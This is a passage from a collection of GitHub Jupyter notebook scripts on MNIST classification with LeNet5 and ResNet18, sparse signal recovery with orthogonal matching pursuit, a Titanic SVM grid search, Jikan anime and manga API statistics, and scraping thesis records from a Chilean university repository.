outputId=\"601df255-4e5c-4b7f-c38f-3c5a648154d6\"\ndef training(model, train_loader, val_loader, epochs, criterion, optimizer, device):\n best_val_acc = 0.0\n best_model_wts = model.state_dict()\n\n train_loss_history = []\n val_loss_history = []\n train_acc_history = []\n val_acc_history = []\n\n for epoch in range(epochs):\n # Train the model for one epoch and obtain the training loss and 
accuracy\n train_loss, train_acc = train_model(model, train_loader, criterion, optimizer, device)\n # Evaluate the model on the validation set and obtain the validation loss and accuracy\n val_loss, val_acc = evaluate_model(model, val_loader, criterion, device)\n\n # Update the best model weights if the current validation accuracy is higher than the previous best\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_model_wts = model.state_dict()\n\n # Append the current epoch's losses and accuracies to the history lists\n train_loss_history.append(train_loss)\n val_loss_history.append(val_loss)\n train_acc_history.append(train_acc.cpu().numpy())\n val_acc_history.append(val_acc.cpu().numpy())\n\n\n model.load_state_dict(best_model_wts)\n return model, train_loss_history, val_loss_history, train_acc_history, val_acc_history\n\nnum_epochs = 10\n\n\nmodels = {\n \"LeNet5\": LeNet5(num_classes=10),\n \"resnet18\": resnet18(num_classes=10)\n}\n\nresults = {}\n\nfor name, model in models.items():\n print(f\"Training {name}\")\n\n # Move the model to the specified device\n model = model.to(device)\n # Set the loss function and optimizer for the model\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n # Train the model using the training function defined earlier\n model, train_loss_hist, val_loss_hist, train_acc_hist, val_acc_hist = training(\n model, train_loader, val_loader, num_epochs, criterion, optimizer, device\n )\n\n # Store the trained model and the history of losses and accuracies in the results dictionary\n results[name] = {\n \"model\": model,\n \"train_loss\": train_loss_hist,\n \"val_loss\": val_loss_hist,\n \"train_acc\": train_acc_hist,\n \"val_acc\": val_acc_hist\n }\n\n print(f\"{name} training completed.\")\n\n\n# + [markdown] id=\"vta7izwk4gK-\"\n# # Plot confusion matrix and F1 score\n#\n#\n\n# + id=\"CN28ml284Niw\"\ndef plot_confusion_matrix(cm, target_names, title='Confusion matrix', cmap=None, normalize=True):\n import itertools\n # Calculate accuracy and misclassification rate\n accuracy = np.trace(cm) / np.sum(cm).astype('float')\n misclass = 1 - accuracy\n\n if cmap is None:\n cmap = plt.get_cmap('Blues')\n\n plt.figure(figsize=(8, 6))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n if normalize: # Normalize the confusion matrix\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2\n # Add the individual cell values as text on the plot\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n if normalize:\n plt.text(j, i, \"{:0.4f}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n else:\n plt.text(j, i, \"{:,}\".format(cm[i, j]),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label\\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))\n plt.show()\n\n\n\ndef compute_metrics(model, dataloader, device):\n model.eval()\n y_true = []\n y_pred = []\n\n with torch.no_grad(): # Turn off gradient calculations\n for inputs, labels in dataloader: # Move the input and target tensors to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n 
outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n y_true.extend(labels.cpu().numpy())\n y_pred.extend(preds.cpu().numpy())\n\n # Compute the confusion matrix and the F1-score\n cm = confusion_matrix(y_true, y_pred)\n f1 = f1_score(y_true, y_pred, average='weighted')\n\n return cm, f1\n\n\n\n# + id=\"nvILodcs4Y9S\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"ecca0ff5-56f8-455f-9f1f-712a80e55ec3\"\nfor name, result in results.items():\n model = result[\"model\"]\n cm, f1 = compute_metrics(model, val_loader, device)\n\n print(f\"{name} Confusion Matrix:\")\n plot_confusion_matrix(cm, list(range(10)), title=f\"{name} Confusion Matrix\")\n\n print(f\"{name} F1 Score: {f1:.4f}\")\n\n# + [markdown] id=\"bVBrY02UqTuC\"\n# # Plot the training loss and accuracy\n#\n\n# + id=\"lnAGGxVmoVVy\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 807} outputId=\"d269002c-9d19-4f7c-8084-626c5b7c8bb9\"\nfig, axes = plt.subplots(2, 2, figsize=(12, 8))\n\nfor name, result in results.items():\n axes[0, 0].plot(result[\"train_loss\"], label=name)\n axes[0, 1].plot(result[\"val_loss\"], label=name)\n axes[1, 0].plot(result[\"train_acc\"], label=name)\n axes[1, 1].plot(result[\"val_acc\"], label=name)\n\naxes[0, 0].set_title(\"Training Loss\")\naxes[0, 1].set_title(\"Validation Loss\")\naxes[1, 0].set_title(\"Training Accuracy\")\naxes[1, 1].set_title(\"Validation Accuracy\")\n\nfor ax in axes.flatten():\n ax.legend()\n ax.set_xlabel(\"Epoch\")\n\nplt.tight_layout()\nplt.show()\n\n\n\n# + [markdown] id=\"pnzbVY3L2ieH\"\n# # Making Predictions\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"AO3rP5h42hzA\" outputId=\"b3ea4f9b-78a7-47d7-9336-cba00879af69\"\ntest_data = pd.read_csv(\"test.csv\")\n\ntest_dataset = MNISTDataset(test_data, transform, mode=\"test\")\ntest_loader = DataLoader(test_dataset, batch_size=100, shuffle=False)\n\nfor name, result in results.items():\n model = result[\"model\"]\n predictions = []\n\n with torch.no_grad():\n for inputs, _ in test_loader:\n # Move the input data to the specified device\n inputs = inputs.to(device)\n # Get the model's output for the input data\n outputs = model(inputs)\n # Find the class with the highest probability (predicted class)\n _, preds = torch.max(outputs, 1)\n # Add the predicted classes to the predictions list\n predictions.extend(preds.cpu().numpy())\n\n submission = pd.DataFrame({\"ImageId\": list(range(1, len(predictions) + 1)), \"Label\": predictions})\n submission.to_csv(f\"{name}_submission.csv\", index=False)\n\n print(f\"Created {name}_submission.csv\")\n\n\n# + id=\"3iIv_ZtWrM9-\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"4e6ece33-07b2-4db9-a635-96b7a3054c03\"\n# !kaggle competitions submit -c digit-recognizer -f resnet18_submission.csv -m \"ResNet18 Submission\"\n# !kaggle competitions submit -c digit-recognizer -f LeNet5_submission.csv -m \"LeNet5 Submission\"\n","repo_name":"antoinebossan1/Codes-for-Kaggle-Competitions","sub_path":"Comparison-of-ResNet-18-and-LeNet-5-Models-for-MNIST-Image-Classification/Comparison_ResNet-18_LeNet-5 Models_MNIST.ipynb","file_name":"Comparison_ResNet-18_LeNet-5 Models_MNIST.ipynb","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"41153506658","text":"import pandas as pd\nimport numpy as np\n\nraw = pd.read_csv('data/training.csv',index_col=0)\n\nfinal = pd.read_csv('cosine_similarity', 
index_col=0)\n\nraw.head()\n\nfinal.head()\n\nfinal.loc[39767]\n\nraw.loc[39767]\n\ndf = raw.join(final['output'], how = 'inner', on = raw.index).drop(columns ='key_0')\n\ndf.sort_values(by = ['output'])\n\n\n","repo_name":"DamielCowen/sentiment_analysis_short_questions","sub_path":"Results.ipynb","file_name":"Results.ipynb","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"17526940599","text":"# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 344} id=\"wUgPnQ_-G5mC\" outputId=\"dbf5bbb9-b6cc-4b7a-800a-c1af97c13437\"\n# !pip install numpy --upgrade\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"UtodD-kz4lib\" outputId=\"e5033b89-905f-4f72-f606-dd928d497841\"\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\ndef GenerateA(M,N):\n A = np.random.normal(0,1,(M,N))\n SumCol = np.linalg.norm(A,axis=0)\n Anormed = A / SumCol[np.newaxis,:]\n return Anormed\n\nprint(GenerateA(2,3))\n\ndef SparseX(N,s):\n x = np.zeros(N)\n index = np.array(range(N))\n index1 = np.random.choice(index,s, replace = False)\n for i in index1:\n p = random.randint(0,1)\n if p == 0:\n x[i] = np.random.uniform(-10,-1)\n else:\n x[i] = np.random.uniform(1,10)\n return x,np.ndarray.tolist(index1)\n\n\nprint(SparseX(5,2))\n\n\n\n\n# + id=\"uRBMEgzEYQkx\"\ndef least_square(A,y):\n out = np.dot(np.dot(np.linalg.inv(np.dot(np.transpose(A),A)),np.transpose(A)),y)\n #out = np.linalg.inv(np.dot(A.T, A)).dot(A.T).dot(y)\n return out\n\ndef omp(A,y):\n M = np.shape(A)[0]\n N = np.shape(A)[1]\n r = np.copy(y)\n x_k = np.zeros(N)\n indexSet = []\n err = np.linalg.norm(r)\n\n while err > 0.0001:\n lambdaK = np.argmax(np.abs(np.dot(np.transpose(A),r)))\n indexSet.append(lambdaK)\n\n DeltaK = A[:,indexSet]\n #print(DeltaK)\n #print(y)\n a_k = least_square(DeltaK,y)\n x_k[indexSet] = a_k\n\n r = y - np.dot(A,x_k)\n err = np.linalg.norm(r)\n #print(err)\n\n return x_k,indexSet\n\n# A = GenerateA(5,10)\n# x,index = SparseX(10,2)\n# print(\"A: \", A)\n# print(\"x: \", x)\n# print(index)\n# y = np.dot(A,x)\n\n# x_k, i = omp(A,y)\n\n\n\n# + id=\"cKT85dQ7gMLA\"\ndef NoiselessCase(N,s_size,mc_time):\n M = range(1,N)\n S = range(1,s_size)\n\n plot_recover = np.zeros((len(M),len(S)))\n plot_normalError = np.zeros((len(M),len(S)))\n for m in M:\n A = GenerateA(m,N)\n\n for s in S:\n \n\n rec_count = 0\n normal_error = 0\n\n for i in range(mc_time):\n x, sparseIndex = SparseX(N,s)\n y = np.dot(A,x)\n \n x_k, recIndex = omp(A,y) \n\n normal_error += np.linalg.norm(x-x_k)/np.linalg.norm(x)\n if len(sparseIndex) == len(recIndex):\n #print(recIndex,sparseIndex)\n if sorted(recIndex) == sorted(sparseIndex):\n rec_count+=1\n else:\n continue\n \n \n\n plot_recover[m-1,s-1] = rec_count/mc_time\n plot_normalError[m-1,s-1] = normal_error/mc_time\n\n return plot_recover,plot_normalError\n\n\n\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 683} id=\"kVzjudRh5q5p\" outputId=\"0dc5897d-594b-4153-ff49-dc80e3671de1\"\np, E = NoiselessCase(20,10,2000)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_20_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 
0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_20_Err.png')\n\n# + id=\"24tvj9YZWjPd\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 683} id=\"OrwFcMeRQzuL\" outputId=\"f81d7268-e006-4960-f2ee-e5b134b4b672\"\np, E = NoiselessCase(50,15,1500)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_50_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_50_Err.png')\n\n# + [markdown] id=\"qBWliAa778w0\"\n# ##Answer\n# As we can see from the ESR plot, when smax > M the plot sharply goes to zero, and when M is larger, the probability of each smax is larger, and the error is smaller.\n# And when the measurement goes larger the probability of exact match goes larger for bigger smaxs\n\n# + id=\"7Y-Ay3g1Q5MP\"\np, E = NoiselessCase(100,20,1000)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_100_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_100_Err.png')\n","repo_name":"leoqzm/ECE269","sub_path":"ECE269_Projects/HW/HW3/ECE269HW3PA.ipynb","file_name":"ECE269HW3PA.ipynb","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"73796878505","text":"# # Trabalho Final - Modelos de IA e Machine Learning\n#\n# ### Integrantes:\n#\n# ### 1) Jurandir Ventura - RM336634\n# ### 2) Marcelo Preto - RM336632\n# ### 3) Fabio Rizzi - RM336656\n# ### 4) Thiago Alexandre – RM336583\n\n# # Exercício 5.1\n#\n# Utilizando o exemplo visto com o SVM e o dataset Titanic faça um GridSearch para encontrar a melhor configuração de parâmetros, entre o tipo de Kernel, pré-processamento (StandardScalar e MinMaxScalar), Gamma e C.\n#\n# Qual foi a melhor configuração que você encontrou? Qual a melhor acurácia?\n#\n# Dica: \n#\n# - Observe a matriz de confusão para verificar se o classificar está conseguindo classificar dados das duas classes;\n# - Normalize os dados;\n\n#Importando as bibliotecas. 
Se houver algum erro, use \"pip install Libname\"\nimport pandas as pd\nimport seaborn as sb\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\n\n# +\n#Leitura do dataset .csv\n\n#Lembrar que a origem da dataset é uma variável.\n#Neste caso é proveniente da pasta de datasets do Github: https://github.com/fiapIA/modelos_de_ia_e_ml/data\n\ndataset = pd.read_csv('data/5.1_titanic/train.csv', sep=',', engine='python')\ndataset.head()\n\n# +\n# Analisando o tamanho do dataset\n\ndataset.shape\n\n# +\n# Visão geral dos dados (com DataType)\n\ndataset.info()\n\n# +\n# Verificaçõ se tem dados nulos / faltantes\n\ndataset.isnull().sum()\n# -\n\n# ## Analisando os dados podemos inferir que algumas colunas não agregam poder decisório ao classificador, são as colunas: PassengerId, Name, Ticket e Cabin. Vamos removê-las do nosso dataset.\n\n# +\n# Limpando o dataset\n\ntitanic_data = dataset.drop(['PassengerId','Name','Ticket','Cabin'], 1)\n\n# +\n# Função para ver a idade média de passageiros em cada Classe (1, 2 e 3).\n# Assim preencheremos os faltantes com a média (mean)\n\ntitanic_data.groupby(['Pclass'])['Age'].mean()\n\n\n# +\n#Função para preencher idade (Age), pois tem 177 dados faltantes.\n\ndef age_approx(cols):\n Age = cols[0]\n Pclass = cols[1]\n \n if pd.isnull(Age):\n if Pclass == 1:\n return 38 #baseado na média de idade de passageiros dessa classe\n elif Pclass == 2:\n return 29 #baseado na média de idade de passageiros dessa classe\n else:\n return 25 #baseado na média de idade de passageiros dessa classe\n else:\n return Age\n\ntitanic_data['Age'] = titanic_data[['Age', 'Pclass']].apply(age_approx, axis=1)\n\n# Verificação se resolveu a questão dos dados nulos / faltantes da coluna 'Age'\n\ntitanic_data.isnull().sum()\n\n# +\n# A coluna \"Embarked\" tem dois registros faltantes. Vamos remover essas duas linhas do dataset.\n\ntitanic_data.dropna(inplace=True)\ntitanic_data.shape\n\n# +\n# Verificação se dados foram removidos\n\ntitanic_data.isnull().sum()\n# -\n\n# ## Por fim, vamos transformar as colunas do tipo Object em numéricas utilizando a função get_dummies.\n\n# +\ngender = pd.get_dummies(titanic_data['Sex'],drop_first=True)\n\nembark_location = pd.get_dummies(titanic_data['Embarked'],drop_first=True)\n\ntitanic_data.drop(['Sex', 'Embarked'],axis=1,inplace=True)\n\ntitanic_dmy = pd.concat([titanic_data,gender,embark_location],axis=1)\ntitanic_dmy.head(15)\n# -\n\n# ## Análise da correlação:\n\nplt.figure(figsize=(20,7))\nsb.heatmap(titanic_dmy.corr(), annot = True)\n\n# ### 'Pclass' e 'Fare' apresentam correlação de -0,55 e 'Q' e 'S' de -0,5. Vamos remover 'Pclass' e 'Q' do nosso dataset. 
\n\ntitanic_dmy.drop(['Pclass'],axis=1,inplace=True)\ntitanic_dmy.drop(['Q'],axis=1,inplace=True)\n\n# ### Separamos a variável alvo das características\n\ny = titanic_dmy['Survived']\nX = titanic_dmy.drop('Survived', axis=1)\n\n# ### Criamos os pipelines para execução do classificador para cada tipo de Kernel e normalização.\n\n# +\npip_1 = Pipeline([\n ('min_max_scaler', MinMaxScaler()),\n ('clf', svm.SVC(kernel='rbf'))\n])\n\npip_2 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='rbf'))\n])\n\npip_3 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='poly'))\n])\n\npip_4 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='linear'))\n])\n\narr_pipelines = [pip_1, pip_2, pip_3, pip_4]\n# -\n\n# ### Executamos o cross-validation de cada um deles e verificamos qual possui a maior acurácia.\n\n# +\nindexAux = 0\n\nfor pip in arr_pipelines:\n resultados = cross_val_predict(pip, X, y, cv=5)\n indexAux += 1\n print ('pip_', indexAux, ' ==> ', metrics.accuracy_score(y,resultados))\n# -\n\n# ### A melhor acurácia foi de 0,826 do kernel RBF com StandardScaler. Próximo passo é utilizarmos o GridSearch para encontrarmos a melhor configuração de parâmetros para esse classificador.\n\n# +\nlista_C = [0.001, 0.01, 0.1, 1, 10,100]\nlista_gamma = [0.001, 0.01, 0.1, 1, 10, 100]\n\nparam_grid = dict(clf__C=lista_C, clf__gamma=lista_gamma)\n\ngrid = GridSearchCV(pip_2, param_grid, cv=5, scoring='accuracy', verbose = 1)\ngrid.fit(X, y)\n\nprint(\"Melhor C e Gamma ==> {}\".format(grid.best_params_))\nprint(\"Melhor Acurácia ==> {}\".format(grid.best_score_))\n# -\n\n# ### O melhor C é 1 e o melhor gamma 0.1 com acurácia de 0.824. Ou seja, nesse modelo, a acurácia é praticamente a mesma da execução sem o fitting dos parâmetros.\n\n# +\npip_5 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='rbf',C=1,gamma=0.1))\n])\n\nresultados = cross_val_predict(pip_5, X, y, cv=5)\n\nprint(\"Acurácia: {}\".format(metrics.accuracy_score(y,resultados)))\nprint(metrics.classification_report(y,resultados,target_names=['0','1']))\n\n# +\n# Matriz de confusão:\n\nsb.heatmap(metrics.confusion_matrix(y, resultados), annot = True, fmt = \"d\")\n# -\n\n# ## O classificador consegue classificar dados das duas \"categorias\", quem sobreviveu e quem não sobreviveu.\n\n\n","repo_name":"JV-cloud/modelos_de_ia_e_ml","sub_path":"5.1.ipynb","file_name":"5.1.ipynb","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"7798130578","text":"# +\n# 统计用户的最近记录\n# 解决方式:\n# 双端队列\n# 实现一个猜数字的小游戏\n\nfrom random import randint\nfrom collections import deque\n\nN = randint(0,100)\nq = deque([],5)\n\ndef guess(k):\n q.append(k)\n if k == N:\n print('right')\n return True\n elif k < N:\n print('less than N')\n return False\n else:\n print('greater than N')\n return False\n\ndata = [randint(0,100) for _ in range(10)]\nprint(data)\nfor x in data:\n guess(x)\n print(q)\n\n \n# -\n\n\n","repo_name":"20130353/python_skill_set","sub_path":"双端队列.ipynb","file_name":"双端队列.ipynb","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"25872706011","text":"# # Get anime and manga stats from API\n\n# ### Imports\n\n# Imports\nimport requests\nimport csv\nfrom ratelimit import limits, sleep_and_retry, RateLimitException\nimport pandas as pd\nfrom backoff import on_exception, 
expo\nimport numpy as np\nimport time\n\n# ### List to store stats\n\n# +\n#Store anime stats\ndata_anime = { \n 'anime_id':[],\n 'watching' :[],\n 'completed':[],\n 'on_hold':[],\n 'dropped':[],\n 'plan_to_watch':[],\n 'total':[]\n}\n\n#Store manga stats\ndata_manga = { \n 'manga_id':[],\n 'reading' :[],\n 'completed':[],\n 'on_hold':[],\n 'dropped':[],\n 'plan_to_read':[],\n 'total':[]\n}\n\n\n# -\n\n# ### Rate Limter\n\n@sleep_and_retry\n@limits(calls = 1, period = 1)\ndef call_api(url):\n response = requests.get(url)\n\n print(url)\n\n if response.status_code != 200:\n return None\n\n return response\n\n\n# ### Get anime ID for top 500\n\n# +\ndf_anime = pd.read_csv(\"Dataset/anime.csv\")\n\ndf_anime.sort_values(by = ['score'], ascending=False, inplace = True)\n\ndf_anime = df_anime.head(500)\n\nanime = np.array_split(df_anime, 2)\n\n\n# -\n\n# ### Get anime data\n\ndef getAnime(i): \n for a in anime[i]['anime_id']:\n url = \"https://api.jikan.moe/v4/anime/\"+ str(a) +\"/statistics\"\n data = call_api(url)\n\n if(data == None):\n print(a)\n \n if(data != None):\n data = data.json()['data']\n\n data_anime['anime_id'].append(a)\n data_anime['watching'].append(data['watching'])\n data_anime['completed'].append(data['completed'])\n data_anime['on_hold'].append(data['on_hold'])\n data_anime['dropped'].append(data['dropped'])\n data_anime['plan_to_watch'].append(data['plan_to_watch'])\n data_anime['total'].append(data['total'])\n\n time.sleep(60)\n\n\ngetAnime(1)\n\n# ### Add to csv\n\ndf = pd.DataFrame(data_anime)\ndf.to_csv('Dataset/anime_stats.csv', index=False)\n\n# ### Get manga ID for top 500\n\n# +\ndf_manga = pd.read_csv(\"Dataset/manga.csv\")\n\ndf_manga.sort_values(by = ['score'], ascending=False, inplace = True)\n\ndf_manga = df_manga.head(500)\n\nmanga = np.array_split(df_manga, 10)\n\n\n# -\n\n# ### Get manga data\n\ndef getManga(i): \n for m in manga[i]['manga_id']:\n print(m)\n\n url = \"https://api.jikan.moe/v4/manga/\"+ str(m) +\"/statistics\"\n data = call_api(url)\n\n if(data == None):\n print(m)\n \n if(data != None):\n data = data.json()['data']\n \n data_manga['manga_id'].append(m)\n data_manga['reading'].append(data['reading'])\n data_manga['completed'].append(data['completed'])\n data_manga['on_hold'].append(data['on_hold'])\n data_manga['dropped'].append(data['dropped'])\n data_manga['plan_to_read'].append(data['plan_to_read'])\n data_manga['total'].append(data['total'])\n\n time.sleep(60)\n\n\ngetManga(0)\n\ngetManga(1)\n\ngetManga(2)\n\ngetManga(3)\n\ngetManga(4)\n\ngetManga(5)\n\ngetManga(6)\n\ngetManga(7)\n\ngetManga(8)\n\ngetManga(9)\n\n# ### Add to csv\n\ndf2 = pd.DataFrame(data_manga)\ndf2.to_csv('Dataset/manga_stats.csv', index=False)\n","repo_name":"Harman367/Anime-and-Manga-Data-Visualisation","sub_path":"get_API_data.ipynb","file_name":"get_API_data.ipynb","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"74053206505","text":"# + [markdown] id=\"UuBE0QQSyHJ3\"\n# # ENLACES DE LAS TESIS Y OBTENIENDO INFORMACIÓN DE UNA SOLA\n\n# + [markdown] id=\"x61ZZvpE9AnX\"\n# ## Tesis disponibles en la página 1\n\n# + id=\"-I3WpCFryq_X\"\nimport requests\nfrom bs4 import BeautifulSoup\n\n# + id=\"bt8z2Wy5pDAI\"\n#Universidad de Chile\nwebsite = \"https://repositorio.uchile.cl\"\nurl = \"https://repositorio.uchile.cl/discover?rpp=10&etal=0&group_by=none&page=1&filtertype_0=type&filter_relational_operator_0=equals&filter_0=Tesis\" #url tesis\n\n# + 
id=\"O64iDgTyyqfx\"\nresp = requests.get(url)\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\n# + id=\"acdHIr8kzhLd\"\ntesis = soup.find_all(class_=\"dosUch\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HO6pYOap1Cus\" outputId=\"58d14e19-d545-4973-9f73-3c2744edc149\"\nlista_tesis = []\nfor i in tesis:\n lista_tesis.append(website + f\"{i.find('a').get('href')}\")\n\nprint(lista_tesis)\n\n# + [markdown] id=\"VfEQUQ7g6veA\"\n# ## Información de una sola tesis\n\n# + id=\"5dsO1uqF60v3\"\nurl_tesis = \"https://repositorio.uchile.cl/handle/2250/189462\"\n\n# + id=\"wDBV0euT7i06\"\nresp = requests.get(url_tesis)\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vW0s7o2P7ozq\" outputId=\"e3a0a258-0393-4aeb-f9fd-7287dd50480e\"\n#Insitución\n\"Universidad de Chile\"\n#Título tesis\nprint(soup.find(\"h2\").text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"TUroASKh8QoV\" outputId=\"3d8be4c8-e0cd-4773-ef01-39546c1d2476\"\n#Nombre del tesista\nprint(soup.find(itemprop = \"author\").text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"ttDzjDr_8-Uo\" outputId=\"19445375-eebe-4542-a71d-4120359413d3\"\n#Grado\na = soup.find(class_=\"simple-item-view-notadetesis\").find_all(\"div\")[1].text\nprint(a)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"BSm4gJ1nBHbo\" outputId=\"503b24a6-d196-4bda-bb49-8ed3b78d0aa4\"\n#Nombre del asesor(es)\na = soup.find_all(class_=\"simple-item-view-authors\", limit = 2)[1]\nfor i in a.find_all(itemprop=\"author\"):\n print(i.text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 36} id=\"AulPkU2c7uWY\" outputId=\"06ca25aa-eb8e-4cca-9c2a-c75dac2656f8\"\nb = []\nfor i in a.find_all(itemprop=\"author\"):\n b.append(i.text)\n\n\", \".join(b)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1Y5ZN2ZyD7JG\" outputId=\"92276d10-a956-4bec-8437-8b0deebebc4b\"\n#Resumen\na = str(soup.find(class_ = \"simple-item-view-description\").find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\nprint(type(a))\nprint(a)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 36} id=\"fQuMD97mE9SN\" outputId=\"a1288cc7-c290-49f3-b316-7457b908f200\"\n#Año\na = str(soup.find(class_=\"simple-item-view-date\").find_all(text=True, recursive=False)[1])\na\n\n# + [markdown] id=\"Vmghz1xR4DKj\"\n# # MUCHOS ENLANCES, TODAS LAS TESIS\n\n# + [markdown] id=\"OHKn0c9z-j_o\"\n# ## Eligiendo la cantidad de tesis:\n# Cada página contiene el enlace a 10 tesis.\n\n# + id=\"6OtHr-G8_RJz\"\nimport csv\n\n# + id=\"CFZB6SFL4FVF\"\nwebsite = \"https://repositorio.uchile.cl\"\nn = 5 #Número de páginas a scrapear\nlista_tesis = []\nfor i in range(1,n+1):\n url = f\"https://repositorio.uchile.cl/discover?rpp=10&etal=0&group_by=none&page={i}&filtertype_0=type&filter_relational_operator_0=equals&filter_0=Tesis\"\n resp = requests.get(url)\n soup = BeautifulSoup(resp.text, \"html.parser\")\n tesis = soup.find_all(class_=\"dosUch\")\n for i in tesis:\n lista_tesis.append(website + f\"{i.find('a').get('href')}\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Eq2He5jsBT-I\" outputId=\"67f8438c-bfda-4c24-b274-418b36081a88\"\nprint(lista_tesis)\n\n# + id=\"MYnMXeJb456Q\"\nwith open(\"Tesis.csv\", \"w\") as csv_file:\n escritor = csv.writer(csv_file, delimiter=\",\")\n escritor.writerow([\"Institución\",\"Título\",\"Autor\", \"Grado\", \"Asesor(es)\", \"Año\", \"Resumen\"])\n\nfor i in lista_tesis:\n resp_t = 
